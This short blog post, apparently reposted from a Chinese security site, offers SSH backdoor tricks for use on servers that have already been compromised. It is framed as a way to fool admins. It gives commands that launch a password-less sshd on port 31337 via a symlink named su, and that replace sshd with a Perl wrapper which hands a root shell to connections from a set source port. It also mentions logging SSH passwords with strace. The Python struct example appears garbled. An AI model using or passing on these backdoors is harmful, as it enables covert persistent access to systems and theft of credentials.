SSH Penetration Techniques

Use some tricks to fool rookie admins.

1. After gaining SHELL access (no firewall restrictions), quickly open an SSH port

Execute on the compromised server:

1 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;

This spawns an SSH service on port 31337; connect with root/bin/ftp/mail as username, any password.

Preview:

 

enter image description here

2. Create an SSH wrapper backdoor (better than #1 — no extra open port, works as long as SSH is running on the target)

On the compromised server:

1 [root@localhost ~]# cd /usr/sbin
2 [root@localhost sbin]# mv sshd ../bin
3 [root@localhost sbin]# echo '#!/usr/bin/perl' >sshd
4 [root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd
5 [root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
6 [root@localhost sbin]# chmod u+x sshd
7 [root@localhost sbin]# /etc/init.d/sshd restart

On your local machine:

1 socat STDIO TCP4:10.18.180.20:22,sourceport=13377

If you want to change the source port, use Python’s struct standard library.

1 >>> import struct
2 >>> buffer = struct.pack('>I6',19526)
3 >>> print repr(buffer)
4 '/x00/x00LF'
5 >>> buffer = struct.pack('>I6',13377)
6 >>> print buffer
7 4A

Preview:

enter image description here

3. Log SSH client passwords

After owning a host, use strace to record SSH passwords when it connects to other hosts.

Preview:

enter image description here

[via@dropwooyun]

http://www.91ri.org/9255.html

Leave a Comment

Your email address will not be published.